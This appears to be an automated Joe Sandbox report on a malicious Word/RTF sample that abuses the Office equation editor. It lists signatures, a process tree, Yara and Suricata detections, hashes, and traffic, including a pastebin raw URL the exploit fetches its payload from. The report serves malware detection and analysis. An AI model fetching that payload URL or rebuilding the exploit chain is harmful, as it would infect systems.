Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
test.doc

Overview

General Information

Sample name:test.doc
Analysis ID:1532551
MD5:f5fc224eb5cbbff8ee4bf4670ed9611a
SHA1:8e3f85dd6fb94da77990987bd26bde7e59042490
SHA256:80f7f23bea03b2386ae91e156835c2a685d9515e0c42f4dd89f782d64a29f701
Tags:docuser-ikoora
Infos:

Detection

Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Connects to a pastebin service (likely for C&C)
Document exploit detected (process start blacklist hit)
Installs new ROOT certificates
Office equation editor establishes network connection
Sigma detected: Equation Editor Network Connection
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Stores large binary data to the registry
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 3284 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 3368 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • taskmgr.exe (PID: 3624 cmdline: "C:\Windows\system32\taskmgr.exe" MD5: 09F7401D56F2393C6CA534FF0241A590)
      • mmc.exe (PID: 4028 cmdline: "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc" MD5: 9FEA051A9585F2A303D55745B4BF63AA)
      • mmc.exe (PID: 2664 cmdline: "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc" MD5: 9FEA051A9585F2A303D55745B4BF63AA)
      • mmc.exe (PID: 2124 cmdline: "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc" MD5: 9FEA051A9585F2A303D55745B4BF63AA)
      • mmc.exe (PID: 3068 cmdline: "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc" MD5: 9FEA051A9585F2A303D55745B4BF63AA)
      • mmc.exe (PID: 2996 cmdline: "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc" MD5: 9FEA051A9585F2A303D55745B4BF63AA)
      • mmc.exe (PID: 3448 cmdline: "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc" MD5: 9FEA051A9585F2A303D55745B4BF63AA)
      • mmc.exe (PID: 3508 cmdline: "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc" MD5: 9FEA051A9585F2A303D55745B4BF63AA)
      • mmc.exe (PID: 1996 cmdline: "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc" MD5: 9FEA051A9585F2A303D55745B4BF63AA)
      • mmc.exe (PID: 3588 cmdline: "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc" MD5: 9FEA051A9585F2A303D55745B4BF63AA)
      • mmc.exe (PID: 2316 cmdline: "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc" MD5: 9FEA051A9585F2A303D55745B4BF63AA)
      • mmc.exe (PID: 3576 cmdline: "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc" MD5: 9FEA051A9585F2A303D55745B4BF63AA)
      • mmc.exe (PID: 1860 cmdline: "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc" MD5: 9FEA051A9585F2A303D55745B4BF63AA)
      • mmc.exe (PID: 3464 cmdline: "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc" MD5: 9FEA051A9585F2A303D55745B4BF63AA)
      • mmc.exe (PID: 3784 cmdline: "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc" MD5: 9FEA051A9585F2A303D55745B4BF63AA)
      • mmc.exe (PID: 3872 cmdline: "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc" MD5: 9FEA051A9585F2A303D55745B4BF63AA)
      • mmc.exe (PID: 4060 cmdline: "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc" MD5: 9FEA051A9585F2A303D55745B4BF63AA)
    • taskmgr.exe (PID: 2464 cmdline: "C:\Windows\system32\taskmgr.exe" MD5: 09F7401D56F2393C6CA534FF0241A590)
    • taskmgr.exe (PID: 924 cmdline: "C:\Windows\system32\taskmgr.exe" MD5: 09F7401D56F2393C6CA534FF0241A590)
    • taskmgr.exe (PID: 728 cmdline: "C:\Windows\system32\taskmgr.exe" MD5: 09F7401D56F2393C6CA534FF0241A590)
    • taskmgr.exe (PID: 2936 cmdline: "C:\Windows\system32\taskmgr.exe" MD5: 09F7401D56F2393C6CA534FF0241A590)
    • taskmgr.exe (PID: 3316 cmdline: "C:\Windows\system32\taskmgr.exe" MD5: 09F7401D56F2393C6CA534FF0241A590)
    • taskmgr.exe (PID: 2628 cmdline: "C:\Windows\system32\taskmgr.exe" MD5: 09F7401D56F2393C6CA534FF0241A590)
    • taskmgr.exe (PID: 1912 cmdline: "C:\Windows\system32\taskmgr.exe" MD5: 09F7401D56F2393C6CA534FF0241A590)
    • taskmgr.exe (PID: 956 cmdline: "C:\Windows\system32\taskmgr.exe" MD5: 09F7401D56F2393C6CA534FF0241A590)
    • taskmgr.exe (PID: 2464 cmdline: "C:\Windows\system32\taskmgr.exe" MD5: 09F7401D56F2393C6CA534FF0241A590)
    • taskmgr.exe (PID: 1692 cmdline: "C:\Windows\system32\taskmgr.exe" MD5: 09F7401D56F2393C6CA534FF0241A590)
    • taskmgr.exe (PID: 3328 cmdline: "C:\Windows\system32\taskmgr.exe" MD5: 09F7401D56F2393C6CA534FF0241A590)
    • taskmgr.exe (PID: 2628 cmdline: "C:\Windows\system32\taskmgr.exe" MD5: 09F7401D56F2393C6CA534FF0241A590)
    • taskmgr.exe (PID: 3660 cmdline: "C:\Windows\system32\taskmgr.exe" MD5: 09F7401D56F2393C6CA534FF0241A590)
    • taskmgr.exe (PID: 3812 cmdline: "C:\Windows\system32\taskmgr.exe" MD5: 09F7401D56F2393C6CA534FF0241A590)
    • taskmgr.exe (PID: 4008 cmdline: "C:\Windows\system32\taskmgr.exe" MD5: 09F7401D56F2393C6CA534FF0241A590)
    • taskmgr.exe (PID: 3308 cmdline: "C:\Windows\system32\taskmgr.exe" MD5: 09F7401D56F2393C6CA534FF0241A590)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
test.docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x7b:$obj2: \objdata
  • 0x868:$obj3: \objupdate

System Summary

barindex
Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 104.20.4.235, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3368, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3368, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3284, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-13T17:15:09.259053+020020273741A Network Trojan was detected104.20.4.235443192.168.2.2249161TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: test.docAvira: detected
Source: test.docReversingLabs: Detection: 64%
Source: test.docVirustotal: Detection: 56%Perma Link

Exploits

barindex
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 104.20.4.235 Port: 443Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.22:49161 version: TLS 1.2

Software Vulnerabilities

barindex
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Source: global trafficDNS query: name: pastebin.com
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.20.4.235:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.20.4.235:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.20.4.235:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.20.4.235:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.20.4.235:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.20.4.235:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.20.4.235:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.20.4.235:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.20.4.235:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.20.4.235:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.20.4.235:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.20.4.235:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.20.4.235:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.20.4.235:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.20.4.235:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.20.4.235:443
Source: global trafficTCP traffic: 104.20.4.235:443 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.20.4.235:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.20.4.235:443
Source: global trafficTCP traffic: 104.20.4.235:443 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 104.20.4.235:443 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.20.4.235:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.20.4.235:443
Source: global trafficTCP traffic: 104.20.4.235:443 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 104.20.4.235:443 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.20.4.235:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.20.4.235:443
Source: global trafficTCP traffic: 104.20.4.235:443 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 104.20.4.235:443 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.20.4.235:443
Source: global trafficTCP traffic: 104.20.4.235:443 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 104.20.4.235:443 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.20.4.235:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.20.4.235:443
Source: global trafficTCP traffic: 104.20.4.235:443 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.20.4.235:443
Source: global trafficTCP traffic: 104.20.4.235:443 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 104.20.4.235:443 -> 192.168.2.22:49161
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.20.4.235:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.20.4.235:443
Source: global trafficTCP traffic: 192.168.2.22:49161 -> 104.20.4.235:443
Source: global trafficTCP traffic: 104.20.4.235:443 -> 192.168.2.22:49161

Networking

barindex
Source: Network trafficSuricata IDS: 2027374 - Severity 1 - ET MALWARE Unknown VBScript Loader with Encoded PowerShell Execution Inbound : 104.20.4.235:443 -> 192.168.2.22:49161
Source: unknownDNS query: name: pastebin.com
Source: Joe Sandbox ViewIP Address: 104.20.4.235 104.20.4.235
Source: Joe Sandbox ViewIP Address: 104.20.4.235 104.20.4.235
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: global trafficHTTP traffic detected: GET /raw/JtdAmHD5 HTTP/1.1Accept: */*Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: pastebin.comConnection: Keep-Alive
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B78A2EBB-134B-4F32-AD23-E4D3EAD5CCE0}.tmpJump to behavior
Source: global trafficHTTP traffic detected: GET /raw/JtdAmHD5 HTTP/1.1Accept: */*Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: pastebin.comConnection: Keep-Alive
Source: EQNEDT32.EXE, 00000002.00000002.1530889300.00000000009C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: global trafficDNS traffic detected: DNS query: pastebin.com
Source: EQNEDT32.EXE, 00000002.00000002.1530889300.00000000009C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: EQNEDT32.EXE, 00000002.00000002.1530889300.00000000009C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: EQNEDT32.EXE, 00000002.00000002.1530889300.00000000009C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: EQNEDT32.EXE, 00000002.00000002.1530889300.00000000009C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
Source: EQNEDT32.EXE, 00000002.00000002.1530889300.00000000009C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: EQNEDT32.EXE, 00000002.00000002.1530889300.00000000009C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: EQNEDT32.EXE, 00000002.00000002.1530889300.00000000009C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: EQNEDT32.EXE, 00000002.00000002.1530889300.00000000009C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
Source: EQNEDT32.EXE, 00000002.00000002.1530889300.00000000009C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
Source: EQNEDT32.EXE, 00000002.00000002.1530889300.00000000009C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
Source: EQNEDT32.EXE, 00000002.00000002.1530889300.00000000009C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
Source: EQNEDT32.EXE, 00000002.00000002.1530889300.00000000009C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
Source: EQNEDT32.EXE, 00000002.00000002.1530889300.00000000009C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
Source: EQNEDT32.EXE, 00000002.00000002.1530889300.00000000009C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
Source: EQNEDT32.EXE, 00000002.00000002.1530889300.00000000009C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: EQNEDT32.EXE, 00000002.00000002.1530889300.00000000009C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: EQNEDT32.EXE, 00000002.00000002.1530889300.000000000097D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/
Source: EQNEDT32.EXE, 00000002.00000003.359634112.000000000097E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/JtdAmHD5
Source: EQNEDT32.EXE, 00000002.00000002.1530889300.00000000009C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/JtdAmHD5...
Source: EQNEDT32.EXE, 00000002.00000002.1530889300.00000000009C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/JtdAmHD5...mpoq
Source: EQNEDT32.EXE, 00000002.00000002.1530889300.0000000000914000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/JtdAmHD556z
Source: EQNEDT32.EXE, 00000002.00000002.1530889300.0000000000914000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/JtdAmHD5598B1687
Source: EQNEDT32.EXE, 00000002.00000002.1530889300.00000000009C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/JtdAmHD5:
Source: EQNEDT32.EXE, 00000002.00000002.1530889300.0000000000914000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/JtdAmHD5Py
Source: EQNEDT32.EXE, 00000002.00000002.1530889300.0000000000914000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/JtdAmHD5dy
Source: EQNEDT32.EXE, 00000002.00000002.1530889300.00000000008F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/JtdAmHD5ed
Source: EQNEDT32.EXE, 00000002.00000002.1530889300.00000000009C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
Source: unknownNetwork traffic detected: HTTP traffic on port 49161 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49161
Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.22:49161 version: TLS 1.2
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEWindow created: window name: CLIPBRDWNDCLASSJump to behavior
Source: C:\Windows\System32\mmc.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
Source: C:\Windows\System32\mmc.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
Source: C:\Windows\System32\mmc.exeWindow created: window name: CLIPBRDWNDCLASS
Source: C:\Windows\System32\mmc.exeWindow created: window name: CLIPBRDWNDCLASS
Source: C:\Windows\System32\mmc.exeWindow created: window name: CLIPBRDWNDCLASS
Source: C:\Windows\System32\mmc.exeWindow created: window name: CLIPBRDWNDCLASS
Source: C:\Windows\System32\mmc.exeWindow created: window name: CLIPBRDWNDCLASS
Source: C:\Windows\System32\mmc.exeWindow created: window name: CLIPBRDWNDCLASS
Source: C:\Windows\System32\mmc.exeWindow created: window name: CLIPBRDWNDCLASS
Source: C:\Windows\System32\mmc.exeWindow created: window name: CLIPBRDWNDCLASS
Source: C:\Windows\System32\mmc.exeWindow created: window name: CLIPBRDWNDCLASS
Source: C:\Windows\System32\mmc.exeWindow created: window name: CLIPBRDWNDCLASS
Source: C:\Windows\System32\mmc.exeWindow created: window name: CLIPBRDWNDCLASS
Source: C:\Windows\System32\mmc.exeWindow created: window name: CLIPBRDWNDCLASS
Source: C:\Windows\System32\mmc.exeWindow created: window name: CLIPBRDWNDCLASS
Source: C:\Windows\System32\mmc.exeWindow created: window name: CLIPBRDWNDCLASS

System Summary

barindex
Source: test.doc, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: test.doc, type: SAMPLEMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: classification engineClassification label: mal92.troj.expl.winDOC@103/6@1/1
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$test.docJump to behavior
Source: C:\Windows\System32\taskmgr.exeMutant created: \Sessions\1\BaseNamedObjects\Local\TASKMGR.879e4d63-6c0e-4544-97f2-1244bd3f6de0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR86CB.tmpJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: test.docReversingLabs: Detection: 64%
Source: test.docVirustotal: Detection: 56%
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\taskmgr.exe "C:\Windows\system32\taskmgr.exe"
Source: C:\Windows\System32\taskmgr.exeProcess created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\taskmgr.exe "C:\Windows\system32\taskmgr.exe"
Source: C:\Windows\System32\taskmgr.exeProcess created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\taskmgr.exe "C:\Windows\system32\taskmgr.exe"
Source: C:\Windows\System32\taskmgr.exeProcess created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\taskmgr.exe "C:\Windows\system32\taskmgr.exe"
Source: C:\Windows\System32\taskmgr.exeProcess created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\taskmgr.exe "C:\Windows\system32\taskmgr.exe"
Source: C:\Windows\System32\taskmgr.exeProcess created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\taskmgr.exe "C:\Windows\system32\taskmgr.exe"
Source: C:\Windows\System32\taskmgr.exeProcess created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\taskmgr.exe "C:\Windows\system32\taskmgr.exe"
Source: C:\Windows\System32\taskmgr.exeProcess created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\taskmgr.exe "C:\Windows\system32\taskmgr.exe"
Source: C:\Windows\System32\taskmgr.exeProcess created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\taskmgr.exe "C:\Windows\system32\taskmgr.exe"
Source: C:\Windows\System32\taskmgr.exeProcess created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"
Source: C:\Windows\System32\taskmgr.exeProcess created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\taskmgr.exe "C:\Windows\system32\taskmgr.exe"
Source: C:\Windows\System32\taskmgr.exeProcess created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\taskmgr.exe "C:\Windows\system32\taskmgr.exe"
Source: C:\Windows\System32\taskmgr.exeProcess created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"
Source: C:\Windows\System32\taskmgr.exeProcess created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\taskmgr.exe "C:\Windows\system32\taskmgr.exe"
Source: C:\Windows\System32\taskmgr.exeProcess created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\taskmgr.exe "C:\Windows\system32\taskmgr.exe"
Source: C:\Windows\System32\taskmgr.exeProcess created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\taskmgr.exe "C:\Windows\system32\taskmgr.exe"
Source: C:\Windows\System32\taskmgr.exeProcess created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\taskmgr.exe "C:\Windows\system32\taskmgr.exe"
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\taskmgr.exe "C:\Windows\system32\taskmgr.exe"Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\taskmgr.exe "C:\Windows\system32\taskmgr.exe"Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\taskmgr.exe "C:\Windows\system32\taskmgr.exe"Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\taskmgr.exe "C:\Windows\system32\taskmgr.exe"Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\taskmgr.exe "C:\Windows\system32\taskmgr.exe"Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\taskmgr.exe "C:\Windows\system32\taskmgr.exe"Jump to behavior
